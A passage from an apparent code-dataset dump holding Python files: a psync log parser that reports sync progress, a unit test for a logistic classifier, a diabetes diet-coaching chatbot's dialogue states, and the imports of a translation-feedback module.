sdata[ mtype ] = 0
sdata[ mtype ] += 1
def process_syncdir_stats( rec, syncdir_data ):
if rec[ 'synctype' ] != 'SYNCDIR':
return
dir_data = syncdir_data[ 'dir_data' ]
dups = syncdir_data[ 'dups' ]
working = syncdir_data[ 'working' ]
ts = rec[ 'ts' ]
msgtype = rec[ 'msgtype' ]
src = rec[ 'src' ]
if src in dups:
return
if msgtype == 'start':
if src in dir_data or src in working:
dups[ src ] = pprint.pformat( rec )
return
working[ src ] = default_dirdata.copy()
working[ src ][ 'start' ] = ts
dir_data[ src ] = working[ src ]
elif msgtype == 'info':
working[ src ] [ 'srctot' ] = 0
for k in [ 'num_src_dirs', 'num_src_files' ]:
working[ src ][ k ] = rec[ k ]
working[ src ] [ 'srctot' ] += rec[ k ]
for k in [ 'num_tgt_dirs', 'num_tgt_files' ]:
working[ src ][ k ] = rec[ k ]
elif msgtype == 'end':
working[ src ][ 'end' ] = ts
working[ src ][ 'elapsed' ] = ts - working[ src ][ 'start' ]
del working[ src ]
else:
raise UserWarning( "Unknown msgtype '{0}' for record '{1}'".format(
msgtype, rec ) )
def print_psync_summary( args, time_data, sync_types, total_rec_count ):
start_time = datetime.datetime.fromtimestamp( time_data[ 'start_ts' ] )
end_time = datetime.datetime.fromtimestamp( time_data[ 'end_ts' ] )
elapsed = end_time - start_time
inodes_completed = 0
for k,v in sync_types.iteritems():
if 'end' in v:
inodes_completed += v[ 'end' ]
pct_complete_by_inodes = inodes_completed * 100.0 / args.inodes
pct_rate = pct_complete_by_inodes / elapsed.total_seconds() * 3600
eta_complete = ( 100.0 - pct_complete_by_inodes ) / pct_rate
psync_summary_outfile = args.infile + '.summary'
with open( psync_summary_outfile, 'w' ) as f:
print(
'Record counts: {rc}\n'
'Total log record count: {tlrc}\n'
'Start time: {st_ts} ({st})\n'
'End time: {et_ts} ({et})\n'
'Elapsed Time: {el}\n'
'Inodes completed : {icnt}\n'
'Total inodes: {itotal}\n'
'Percent Complete: {pct_c:4.2f}\n'
'Percent rate (per Hour): {pct_ph:4.2f}\n'
'Estimated time remaining (hours): {eta:4.2f}\n'.format(
rc = pprint.pformat( sync_types ),
tlrc = total_rec_count,
st_ts = time_data[ 'start_ts' ],
st = str( start_time ),
et_ts = time_data[ 'end_ts' ],
et = str( end_time ),
el = str( elapsed ),
icnt = inodes_completed,
itotal = args.inodes,
pct_c = pct_complete_by_inodes,
pct_ph = pct_rate,
eta = eta_complete ), file=f )
def print_syncdir_summary( args, syncdir_data ):
# Duplicates (if there are any)
dup_outfile = args.infile + '.duplicate_dirs'
with open( dup_outfile, 'w' ) as f:
for d in syncdir_data[ 'dups' ]:
f.write( d )
# Dirs without end records
working_outfile = args.infile + '.unfinished_dirs'
with open( working_outfile, 'w' ) as f:
for k in syncdir_data[ 'working' ]:
print( k, file=f )
# Dir Data
syncdir_outfile = args.infile + '.syncdir_data'
outfmt = '{elapsed:>7} {nsd:>7} {nsf:>7} {srctot:>7} {src}'
outkeys = ( 'elapsed', 'nsd', 'nsf', 'srctot', 'src' )
hdrs1 = ( 'Elap', 'SRC', 'SRC', 'SRC', 'Key' )
hdrs2 = ( 'Secs', 'Dir', 'Reg', 'Total', 'SrcDir' )
with open( syncdir_outfile, 'w' ) as f:
print( outfmt.format( **( dict( zip( outkeys, hdrs1 ) ) ) ), file=f )
print( outfmt.format( **( dict( zip( outkeys, hdrs2 ) ) ) ), file=f )
for k, d in syncdir_data[ 'dir_data' ].iteritems():
print( outfmt.format( elapsed = d[ 'elapsed' ],
nsd = d[ 'num_src_dirs' ],
nsf = d[ 'num_src_files' ],
srctot = d[ 'srctot' ],
src = k ), file=f )
def run( args ):
time_data = dict(
start_ts = int( time.time() ),
end_ts = 0
)
sync_types = {}
syncdir_data = dict(
dir_data = collections.OrderedDict(),
dups = collections.OrderedDict(),
working = {}
)
starttime = int( time.time() )
total_records = 0
with open( args.infile, 'rb' ) as f:
try:
while (1):
total_records += 1
rec = cbor.load( f )
#logr.debug( 'Processing record: {0}'.format( rec ) )
process_start_end_times( rec, time_data )
count_sync_types( rec, sync_types )
try:
process_syncdir_stats( rec, syncdir_data )
except ( KeyError ) as e:
logr.warning( 'LogRecord={0}, Error={1}'.format(
total_records, e ) )
if total_records % 1000000 == 0:
elapsed_secs = int( time.time() ) - starttime
logr.info( 'Processed {0} records in {1} secs'.format(
total_records, elapsed_secs ) )
except ( EOFError ) as e:
pass
print_syncdir_summary( args, syncdir_data )
print_psync_summary( args, time_data, sync_types, total_records )
if __name__ == '__main__':
loglvl = logging.DEBUG
logging.basicConfig(
level=loglvl,
format="%(levelname)s-%(filename)s[%(lineno)d]-%(funcName)s-%(message)s"
)
args = process_cmdline()
run( args ) | bin/parse_psync_infolog.py | from __future__ import print_function
import cbor
import argparse
import datetime
import time
import pprint
import collections
import logging
logr = logging.getLogger( __name__ )
default_dirdata = { 'start': 0,
'num_src_dirs': 0,
'num_src_files': 0,
'num_tgt_dirs': 0,
'num_tgt_files': 0,
'srctot': 0,
'end': 0,
'elapsed': 999999,
}
def process_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument( 'infile' )
parser.add_argument( '--inodes', '-i', type=int, metavar='N',
help='Source file system has N inodes total. '
'Used to estimate completion progress.' )
default_options = {
'inodes': 220531082,
}
parser.set_defaults( **default_options )
args = parser.parse_args()
return args
def process_start_end_times( rec, time_data ):
newts = rec[ 'ts' ]
if newts < time_data[ 'start_ts' ]:
time_data[ 'start_ts' ] = newts
elif newts > time_data[ 'end_ts' ]:
time_data[ 'end_ts' ] = newts
def count_sync_types( rec, sync_types ):
try:
stype = rec[ 'synctype' ]
except( KeyError ) as e:
logr.warning( "No synctype in record: {0}".format( rec ) )
return
mtype = 'None'
try:
mtype = rec[ 'msgtype' ]
except ( KeyError ) as e:
pass
if stype not in sync_types:
sync_types[ stype ] = {}
sdata = sync_types[ stype ]
if mtype not in sdata:
sdata[ mtype ] = 0
sdata[ mtype ] += 1
def process_syncdir_stats( rec, syncdir_data ):
if rec[ 'synctype' ] != 'SYNCDIR':
return
dir_data = syncdir_data[ 'dir_data' ]
dups = syncdir_data[ 'dups' ]
working = syncdir_data[ 'working' ]
ts = rec[ 'ts' ]
msgtype = rec[ 'msgtype' ]
src = rec[ 'src' ]
if src in dups:
return
if msgtype == 'start':
if src in dir_data or src in working:
dups[ src ] = pprint.pformat( rec )
return
working[ src ] = default_dirdata.copy()
working[ src ][ 'start' ] = ts
dir_data[ src ] = working[ src ]
elif msgtype == 'info':
working[ src ] [ 'srctot' ] = 0
for k in [ 'num_src_dirs', 'num_src_files' ]:
working[ src ][ k ] = rec[ k ]
working[ src ] [ 'srctot' ] += rec[ k ]
for k in [ 'num_tgt_dirs', 'num_tgt_files' ]:
working[ src ][ k ] = rec[ k ]
elif msgtype == 'end':
working[ src ][ 'end' ] = ts
working[ src ][ 'elapsed' ] = ts - working[ src ][ 'start' ]
del working[ src ]
else:
raise UserWarning( "Unknown msgtype '{0}' for record '{1}'".format(
msgtype, rec ) )
def print_psync_summary( args, time_data, sync_types, total_rec_count ):
start_time = datetime.datetime.fromtimestamp( time_data[ 'start_ts' ] )
end_time = datetime.datetime.fromtimestamp( time_data[ 'end_ts' ] )
elapsed = end_time - start_time
inodes_completed = 0
for k,v in sync_types.iteritems():
if 'end' in v:
inodes_completed += v[ 'end' ]
pct_complete_by_inodes = inodes_completed * 100.0 / args.inodes
pct_rate = pct_complete_by_inodes / elapsed.total_seconds() * 3600
eta_complete = ( 100.0 - pct_complete_by_inodes ) / pct_rate
psync_summary_outfile = args.infile + '.summary'
with open( psync_summary_outfile, 'w' ) as f:
print(
'Record counts: {rc}\n'
'Total log record count: {tlrc}\n'
'Start time: {st_ts} ({st})\n'
'End time: {et_ts} ({et})\n'
'Elapsed Time: {el}\n'
'Inodes completed : {icnt}\n'
'Total inodes: {itotal}\n'
'Percent Complete: {pct_c:4.2f}\n'
'Percent rate (per Hour): {pct_ph:4.2f}\n'
'Estimated time remaining (hours): {eta:4.2f}\n'.format(
rc = pprint.pformat( sync_types ),
tlrc = total_rec_count,
st_ts = time_data[ 'start_ts' ],
st = str( start_time ),
et_ts = time_data[ 'end_ts' ],
et = str( end_time ),
el = str( elapsed ),
icnt = inodes_completed,
itotal = args.inodes,
pct_c = pct_complete_by_inodes,
pct_ph = pct_rate,
eta = eta_complete ), file=f )
def print_syncdir_summary( args, syncdir_data ):
# Duplicates (if there are any)
dup_outfile = args.infile + '.duplicate_dirs'
with open( dup_outfile, 'w' ) as f:
for d in syncdir_data[ 'dups' ]:
f.write( d )
# Dirs without end records
working_outfile = args.infile + '.unfinished_dirs'
with open( working_outfile, 'w' ) as f:
for k in syncdir_data[ 'working' ]:
print( k, file=f )
# Dir Data
syncdir_outfile = args.infile + '.syncdir_data'
outfmt = '{elapsed:>7} {nsd:>7} {nsf:>7} {srctot:>7} {src}'
outkeys = ( 'elapsed', 'nsd', 'nsf', 'srctot', 'src' )
hdrs1 = ( 'Elap', 'SRC', 'SRC', 'SRC', 'Key' )
hdrs2 = ( 'Secs', 'Dir', 'Reg', 'Total', 'SrcDir' )
with open( syncdir_outfile, 'w' ) as f:
print( outfmt.format( **( dict( zip( outkeys, hdrs1 ) ) ) ), file=f )
print( outfmt.format( **( dict( zip( outkeys, hdrs2 ) ) ) ), file=f )
for k, d in syncdir_data[ 'dir_data' ].iteritems():
print( outfmt.format( elapsed = d[ 'elapsed' ],
nsd = d[ 'num_src_dirs' ],
nsf = d[ 'num_src_files' ],
srctot = d[ 'srctot' ],
src = k ), file=f )
def run( args ):
time_data = dict(
start_ts = int( time.time() ),
end_ts = 0
)
sync_types = {}
syncdir_data = dict(
dir_data = collections.OrderedDict(),
dups = collections.OrderedDict(),
working = {}
)
starttime = int( time.time() )
total_records = 0
with open( args.infile, 'rb' ) as f:
try:
while (1):
total_records += 1
rec = cbor.load( f )
#logr.debug( 'Processing record: {0}'.format( rec ) )
process_start_end_times( rec, time_data )
count_sync_types( rec, sync_types )
try:
process_syncdir_stats( rec, syncdir_data )
except ( KeyError ) as e:
logr.warning( 'LogRecord={0}, Error={1}'.format(
total_records, e ) )
if total_records % 1000000 == 0:
elapsed_secs = int( time.time() ) - starttime
logr.info( 'Processed {0} records in {1} secs'.format(
total_records, elapsed_secs ) )
except ( EOFError ) as e:
pass
print_syncdir_summary( args, syncdir_data )
print_psync_summary( args, time_data, sync_types, total_records )
if __name__ == '__main__':
loglvl = logging.DEBUG
logging.basicConfig(
level=loglvl,
format="%(levelname)s-%(filename)s[%(lineno)d]-%(funcName)s-%(message)s"
)
args = process_cmdline()
run( args ) | 0.179171 | 0.099077 |
import unittest
import numpy as np
from pyml.linear_model.classification import sigmoid
from pyml.linear_model.classification import LogisticClassifier
class test_classification(unittest.TestCase):
def test_sigmoid(self):
result = sigmoid(np.array([0,2]))
true_result = np.array([0.5, 0.88079708])
np.testing.assert_almost_equal(result, true_result)
def test_propagate(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
test_dw = np.array([[0.99993216],[1.99980262]])
test_db = 0.49993523062470574
test_cost = 6.000064773192205
lc = LogisticClassifier()
grads, cost = lc.propagate(w, b, X, Y)
np.testing.assert_array_almost_equal(grads['dw'], test_dw)
np.testing.assert_array_almost_equal(grads['db'], test_db)
np.testing.assert_array_almost_equal(cost, test_cost)
def test_optimier(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
std_w = np.array([[0.1124579 ],[0.23106775]])
std_b = np.array(1.5593049248448891)
std_dw = np.array([[0.90158428],[1.76250842]])
std_db = np.array(0.4304620716786828)
std_cost = [6.000064773192205]
lc = LogisticClassifier(learning_rate = 0.009)
params, grads, costs = lc.optimize(w, b, X, Y, num_iterations= 100)
np.testing.assert_array_almost_equal(params['w'], std_w)
np.testing.assert_array_almost_equal(params['b'], std_b)
np.testing.assert_array_almost_equal(grads['dw'], std_dw)
np.testing.assert_array_almost_equal(grads['db'], std_db)
np.testing.assert_array_almost_equal(costs, std_cost)
def test_pred(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
lc = LogisticClassifier()
lc.parameters['w'] = w
lc.parameters['b'] = b
y_pred = lc.predict(X.T)
std_y_pred = np.array([1,1])
np.testing.assert_array_almost_equal(y_pred, std_y_pred)
if __name__ == '__main__':
unittest.main() | linear_model/tests/test_classification.py | import unittest
import numpy as np
from pyml.linear_model.classification import sigmoid
from pyml.linear_model.classification import LogisticClassifier
class test_classification(unittest.TestCase):
def test_sigmoid(self):
result = sigmoid(np.array([0,2]))
true_result = np.array([0.5, 0.88079708])
np.testing.assert_almost_equal(result, true_result)
def test_propagate(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
test_dw = np.array([[0.99993216],[1.99980262]])
test_db = 0.49993523062470574
test_cost = 6.000064773192205
lc = LogisticClassifier()
grads, cost = lc.propagate(w, b, X, Y)
np.testing.assert_array_almost_equal(grads['dw'], test_dw)
np.testing.assert_array_almost_equal(grads['db'], test_db)
np.testing.assert_array_almost_equal(cost, test_cost)
def test_optimier(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
std_w = np.array([[0.1124579 ],[0.23106775]])
std_b = np.array(1.5593049248448891)
std_dw = np.array([[0.90158428],[1.76250842]])
std_db = np.array(0.4304620716786828)
std_cost = [6.000064773192205]
lc = LogisticClassifier(learning_rate = 0.009)
params, grads, costs = lc.optimize(w, b, X, Y, num_iterations= 100)
np.testing.assert_array_almost_equal(params['w'], std_w)
np.testing.assert_array_almost_equal(params['b'], std_b)
np.testing.assert_array_almost_equal(grads['dw'], std_dw)
np.testing.assert_array_almost_equal(grads['db'], std_db)
np.testing.assert_array_almost_equal(costs, std_cost)
def test_pred(self):
w, b, X, Y = np.array([[1],[2]]), 2, np.array([[1,2],[3,4]]), np.array([[1,0]])
lc = LogisticClassifier()
lc.parameters['w'] = w
lc.parameters['b'] = b
y_pred = lc.predict(X.T)
std_y_pred = np.array([1,1])
np.testing.assert_array_almost_equal(y_pred, std_y_pred)
if __name__ == '__main__':
unittest.main() | 0.554953 | 0.705779 |
import management_utils.response_manager as ResponseManager
import management_utils.search_based_conversation as SBC
import data_retrieval.memoryManager as shortTermData
import management_utils.diabetesConversation as diabetesConversation
from management_utils.conditionChooser import ConditionChooser
from management_utils.questionDetector import QuestionDetector
class Session1Start:
def __init__(self):
self.responseUtils = ResponseManager.ResponseManager()
self.DiabetesAnswers = SBC.SearchBasedConversation(diabetesConversation.conversation, "Diabetes Questions")
self.questionDetector = QuestionDetector()
self.ID = "1234"
self.username = ""
self.firstTimeDiabetesQuestion = True
self.gender = 0
self.age = 18
self.weight = 60
self.height = 160
#Load user data
self.shortTermData = shortTermData.MemoryManager()
self.shortTermData.data["session"] = 1
self.conditionChooser = ConditionChooser()
self.generated = False
self.states = [
{
"name": "GetStartedGreeting",
"statement": self.GetStartedGreetingStatement,
"response": "IntroduceProcesses",
"stateType": "Statement"
},
{
"name": "IntroduceProcesses",
"statement": "To begin, I will be working with you to develop a positive diet related habit over the next three days that can help you manage or prevent type II diabetes more effectively.",
"response": "ExplainTypeIIDiabetes",
"stateType": "Statement"
},
{
"name": "ExplainTypeIIDiabetes",
"statement": "Type 2 diabetes is a condition that results in a high blood glucose level. Blood glucose is also known as blood sugar. Type 2 diabetes results in symptoms like increased thirst and tiredness. Long term effects can be more serious. Long term effects include, but are not limited to heart disease, strokes, and kidney failure. Needless to say, the effects of diabetes when left untreated are extremely serious.",
"response": "ExplainTreatments",
"stateType": "Statement"
},
{
"name": "ExplainTreatments",
"statement": "There are a variety of treatments for Type II diabetes, but two approaches that are under your control are that of diet management and exercise. I will be focusing on diet.",
"response": "CurrentFeelings",
"stateType": "Statement"
},
{
"name": "CurrentFeelings",
"statement": "Are you feeling excited to start? Nervous? What feelings are you having right now?",
"response": self.CurrentFeelingsResponse,
"stateType": "AnswerResponse"
},
{
"name": "AnswerDiabetesQuestions",
"statement": self.AnswerDiabetesQuestionsStatement,
"response": self.AnswerDiabetesQuestionsResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskDiabetesQuestion",
"statement": "What is your question?",
"response": self.AskDiabetesQuestionResponse,
"stateType": "AnswerResponse"
},
{
"name": "DiabetesAnswer",
"statement": self.ProvideDiabetesAnswer,
"response": "AnswerDiabetesQuestions",
"stateType": "Statement"
},
{
"name": "ListGoals",
"statement": self.ListGoalsStatement,
"response": self.ListGoalsResponse,
"stateType": "Statement"
},
{
"name": "AskGender",
"statement": "What is your gender?",
"response": self.AskGenderResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmGender",
"statement": self.ConfirmGenderStatement,
"response": self.ConfirmGenderResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskAge",
"statement": "What is your age in years?",
"response": self.AskAgeResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmAge",
"statement": self.ConfirmAgeStatement,
"response": self.ConfirmAgeResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskWeight",
"statement": "What is your weight in kilograms?",
"response": self.AskWeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmWeight",
"statement": self.ConfirmWeightStatement,
"response": self.ConfirmWeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskHeight",
"statement": "What is your height in centimeters?",
"response": self.AskHeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmHeight",
"statement": self.ConfirmHeightStatement,
"response": self.ConfirmHeightResponse,
"stateType": "AnswerResponse"
}
]
def GetStartedGreetingStatement(self):
#Load the data here because it is the first statement.
self.shortTermData.readData()
self.ID = self.shortTermData.data["id"]
self.username = self.shortTermData.data["name"]
self.shortTermData.data["condition"] = self.conditionChooser.getCondition()
if "generated" in self.shortTermData.data:
if self.shortTermData.data["generated"] is True:
self.generated = True
else:
self.shortTermData.data["physicalData"] = {}
if self.generated:
return "I have already looked over the personal information you provided beforehand, so we can dive right into your diet and a goal to work on. " + "It is nice to meet you " + self.username + ". Let's work hard towards improving your diet."
else:
return "Great. Nice to meet you " + self.username + ". Let's start improving your diet"
def AnswerDiabetesQuestionsResponse(self, response):
nextState = "AskDiabetesQuestion"
#Determine if a question is asked here. If not, go through the yes/no process
if self.questionDetector.IsQuestion(response):
self.DiabetesQuestionAnswer = self.DiabetesAnswers.askQuestion(response)
nextState = "DiabetesAnswer"
else:
decision = self.responseUtils.YesOrNoSearch(response)
if decision is 0:
nextState = "ListGoals"
else:
nextState = "AskDiabetesQuestion"
return [], nextState
def CurrentFeelingsResponse(self, response):
nextState = "AnswerDiabetesQuestions"
self.shortTermData.data["experiences"] = []
self.shortTermData.data["experiences"].append({
"Question": "Are you feeling excited to start? Nervous? What feelings are you having right now?",
"Answer": response,
"session": 1
})
return [], nextState
def AnswerDiabetesQuestionsStatement(self):
if not self.firstTimeDiabetesQuestion:
return "Do you have any other questions?"
else:
self.firstTimeDiabetesQuestion = False
return "Do you have any questions about Type 2 Diabetes So far?"
def AskDiabetesQuestionResponse(self, response):
nextState = "DiabetesAnswer"
self.DiabetesQuestionAnswer = self.DiabetesAnswers.askQuestion(response)
return [], nextState
def ProvideDiabetesAnswer(self):
return self.DiabetesQuestionAnswer
def ListGoalsStatement(self):
statement = "There are two possible goals that you can choose. These are calorie restriction, and sugar reduction. Before we choose a goal, I would like to ask you for a few personal details so that we can ensure that the goal that is chosen is appropriate for you."
if self.generated:
statement = "There are two possible goals that you can choose. These are calorie restriction, and sugar reduction."
return statement
def ListGoalsResponse(self, response):
nextState = "AskGender"
if self.generated:
self.shortTermData.writeData()
nextState = "ListGoals2"
return [], nextState
def AskGenderResponse(self, response):
nextState = "ConfirmGender"
gender = self.responseUtils.DetermineGender(response)
if gender is 0:
self.gender = "female"
elif gender is 1:
self.gender = "male"
else:
self.gender = "undefined"
return [], nextState
def ConfirmGenderStatement(self):
return "Your gender is " + self.gender + ". Do I have that right?"
def ConfirmGenderResponse(self, response):
nextState = "AskGender"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskGender"
else:
self.shortTermData.data["physicalData"]["gender"] = self.gender
nextState = "AskAge"
return [], nextState
def AskAgeResponse(self, response):
nextState = "ConfirmAge"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.age = numbers[0]
return [], nextState
def ConfirmAgeStatement(self):
return "You are " + str(self.age) + " years old. Is this correct?"
def ConfirmAgeResponse(self, response):
nextState = "AskAge"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskAge"
else:
self.shortTermData.data["physicalData"]["age"] = self.age
self.shortTermData.writeData()
nextState = "AskWeight"
return [], nextState
def AskWeightResponse(self, response):
nextState = "ConfirmWeight"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.weight = numbers[0]
return [], nextState
def ConfirmWeightStatement(self):
return "Your weight is " + str(self.weight) + " kilograms. Is that right?"
def ConfirmWeightResponse(self, response):
nextState = "AskWeight"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskWeight"
else:
self.shortTermData.data["physicalData"]["weight"] = self.weight
nextState = "AskHeight"
return [], nextState
def AskHeightResponse(self, response):
nextState = "ConfirmHeight"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.height = numbers[0]
return [], nextState
def ConfirmHeightStatement(self):
return "Your height is " + str(self.height) + " centimeters. Is that correct?"
def ConfirmHeightResponse(self, response):
nextState = "AskHeight"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskHeight"
else:
self.shortTermData.data["physicalData"]["height"] = self.height
self.shortTermData.writeData()
nextState = "ListGoals2"
return [], nextState | Client/dialogue_states/session1Start.py | import management_utils.response_manager as ResponseManager
import management_utils.search_based_conversation as SBC
import data_retrieval.memoryManager as shortTermData
import management_utils.diabetesConversation as diabetesConversation
from management_utils.conditionChooser import ConditionChooser
from management_utils.questionDetector import QuestionDetector
class Session1Start:
def __init__(self):
self.responseUtils = ResponseManager.ResponseManager()
self.DiabetesAnswers = SBC.SearchBasedConversation(diabetesConversation.conversation, "Diabetes Questions")
self.questionDetector = QuestionDetector()
self.ID = "1234"
self.username = ""
self.firstTimeDiabetesQuestion = True
self.gender = 0
self.age = 18
self.weight = 60
self.height = 160
#Load user data
self.shortTermData = shortTermData.MemoryManager()
self.shortTermData.data["session"] = 1
self.conditionChooser = ConditionChooser()
self.generated = False
self.states = [
{
"name": "GetStartedGreeting",
"statement": self.GetStartedGreetingStatement,
"response": "IntroduceProcesses",
"stateType": "Statement"
},
{
"name": "IntroduceProcesses",
"statement": "To begin, I will be working with you to develop a positive diet related habit over the next three days that can help you manage or prevent type II diabetes more effectively.",
"response": "ExplainTypeIIDiabetes",
"stateType": "Statement"
},
{
"name": "ExplainTypeIIDiabetes",
"statement": "Type 2 diabetes is a condition that results in a high blood glucose level. Blood glucose is also known as blood sugar. Type 2 diabetes results in symptoms like increased thirst and tiredness. Long term effects can be more serious. Long term effects include, but are not limited to heart disease, strokes, and kidney failure. Needless to say, the effects of diabetes when left untreated are extremely serious.",
"response": "ExplainTreatments",
"stateType": "Statement"
},
{
"name": "ExplainTreatments",
"statement": "There are a variety of treatments for Type II diabetes, but two approaches that are under your control are that of diet management and exercise. I will be focusing on diet.",
"response": "CurrentFeelings",
"stateType": "Statement"
},
{
"name": "CurrentFeelings",
"statement": "Are you feeling excited to start? Nervous? What feelings are you having right now?",
"response": self.CurrentFeelingsResponse,
"stateType": "AnswerResponse"
},
{
"name": "AnswerDiabetesQuestions",
"statement": self.AnswerDiabetesQuestionsStatement,
"response": self.AnswerDiabetesQuestionsResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskDiabetesQuestion",
"statement": "What is your question?",
"response": self.AskDiabetesQuestionResponse,
"stateType": "AnswerResponse"
},
{
"name": "DiabetesAnswer",
"statement": self.ProvideDiabetesAnswer,
"response": "AnswerDiabetesQuestions",
"stateType": "Statement"
},
{
"name": "ListGoals",
"statement": self.ListGoalsStatement,
"response": self.ListGoalsResponse,
"stateType": "Statement"
},
{
"name": "AskGender",
"statement": "What is your gender?",
"response": self.AskGenderResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmGender",
"statement": self.ConfirmGenderStatement,
"response": self.ConfirmGenderResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskAge",
"statement": "What is your age in years?",
"response": self.AskAgeResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmAge",
"statement": self.ConfirmAgeStatement,
"response": self.ConfirmAgeResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskWeight",
"statement": "What is your weight in kilograms?",
"response": self.AskWeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmWeight",
"statement": self.ConfirmWeightStatement,
"response": self.ConfirmWeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "AskHeight",
"statement": "What is your height in centimeters?",
"response": self.AskHeightResponse,
"stateType": "AnswerResponse"
},
{
"name": "ConfirmHeight",
"statement": self.ConfirmHeightStatement,
"response": self.ConfirmHeightResponse,
"stateType": "AnswerResponse"
}
]
def GetStartedGreetingStatement(self):
#Load the data here because it is the first statement.
self.shortTermData.readData()
self.ID = self.shortTermData.data["id"]
self.username = self.shortTermData.data["name"]
self.shortTermData.data["condition"] = self.conditionChooser.getCondition()
if "generated" in self.shortTermData.data:
if self.shortTermData.data["generated"] is True:
self.generated = True
else:
self.shortTermData.data["physicalData"] = {}
if self.generated:
return "I have already looked over the personal information you provided beforehand, so we can dive right into your diet and a goal to work on. " + "It is nice to meet you " + self.username + ". Let's work hard towards improving your diet."
else:
return "Great. Nice to meet you " + self.username + ". Let's start improving your diet"
def AnswerDiabetesQuestionsResponse(self, response):
nextState = "AskDiabetesQuestion"
#Determine if a question is asked here. If not, go through the yes/no process
if self.questionDetector.IsQuestion(response):
self.DiabetesQuestionAnswer = self.DiabetesAnswers.askQuestion(response)
nextState = "DiabetesAnswer"
else:
decision = self.responseUtils.YesOrNoSearch(response)
if decision is 0:
nextState = "ListGoals"
else:
nextState = "AskDiabetesQuestion"
return [], nextState
def CurrentFeelingsResponse(self, response):
nextState = "AnswerDiabetesQuestions"
self.shortTermData.data["experiences"] = []
self.shortTermData.data["experiences"].append({
"Question": "Are you feeling excited to start? Nervous? What feelings are you having right now?",
"Answer": response,
"session": 1
})
return [], nextState
def AnswerDiabetesQuestionsStatement(self):
if not self.firstTimeDiabetesQuestion:
return "Do you have any other questions?"
else:
self.firstTimeDiabetesQuestion = False
return "Do you have any questions about Type 2 Diabetes So far?"
def AskDiabetesQuestionResponse(self, response):
nextState = "DiabetesAnswer"
self.DiabetesQuestionAnswer = self.DiabetesAnswers.askQuestion(response)
return [], nextState
def ProvideDiabetesAnswer(self):
return self.DiabetesQuestionAnswer
def ListGoalsStatement(self):
statement = "There are two possible goals that you can choose. These are calorie restriction, and sugar reduction. Before we choose a goal, I would like to ask you for a few personal details so that we can ensure that the goal that is chosen is appropriate for you."
if self.generated:
statement = "There are two possible goals that you can choose. These are calorie restriction, and sugar reduction."
return statement
def ListGoalsResponse(self, response):
nextState = "AskGender"
if self.generated:
self.shortTermData.writeData()
nextState = "ListGoals2"
return [], nextState
def AskGenderResponse(self, response):
nextState = "ConfirmGender"
gender = self.responseUtils.DetermineGender(response)
if gender is 0:
self.gender = "female"
elif gender is 1:
self.gender = "male"
else:
self.gender = "undefined"
return [], nextState
def ConfirmGenderStatement(self):
return "Your gender is " + self.gender + ". Do I have that right?"
def ConfirmGenderResponse(self, response):
nextState = "AskGender"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskGender"
else:
self.shortTermData.data["physicalData"]["gender"] = self.gender
nextState = "AskAge"
return [], nextState
def AskAgeResponse(self, response):
nextState = "ConfirmAge"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.age = numbers[0]
return [], nextState
def ConfirmAgeStatement(self):
return "You are " + str(self.age) + " years old. Is this correct?"
def ConfirmAgeResponse(self, response):
nextState = "AskAge"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskAge"
else:
self.shortTermData.data["physicalData"]["age"] = self.age
self.shortTermData.writeData()
nextState = "AskWeight"
return [], nextState
def AskWeightResponse(self, response):
nextState = "ConfirmWeight"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.weight = numbers[0]
return [], nextState
def ConfirmWeightStatement(self):
return "Your weight is " + str(self.weight) + " kilograms. Is that right?"
def ConfirmWeightResponse(self, response):
nextState = "AskWeight"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskWeight"
else:
self.shortTermData.data["physicalData"]["weight"] = self.weight
nextState = "AskHeight"
return [], nextState
def AskHeightResponse(self, response):
nextState = "ConfirmHeight"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.height = numbers[0]
return [], nextState
def ConfirmHeightStatement(self):
return "Your height is " + str(self.height) + " centimeters. Is that correct?"
def ConfirmHeightResponse(self, response):
nextState = "AskHeight"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskHeight"
else:
self.shortTermData.data["physicalData"]["height"] = self.height
self.shortTermData.writeData()
nextState = "ListGoals2"
return [], nextState | 0.459319 | 0.366051 |
import os
import sys
import pickle
from typing import List, Tuple, Union
from difflib import ndiff
import torch
from torch.utils.data import DataLoader
import torch.optim as optim
import sentencepiece as spm
import sacrebleu
from hnmt.feedback_requester.util import calculate_entropy
from hnmt.utils import calculate_effort, normalize_effort_scores
from hnmt.nmt.main import get_document_nmt_output
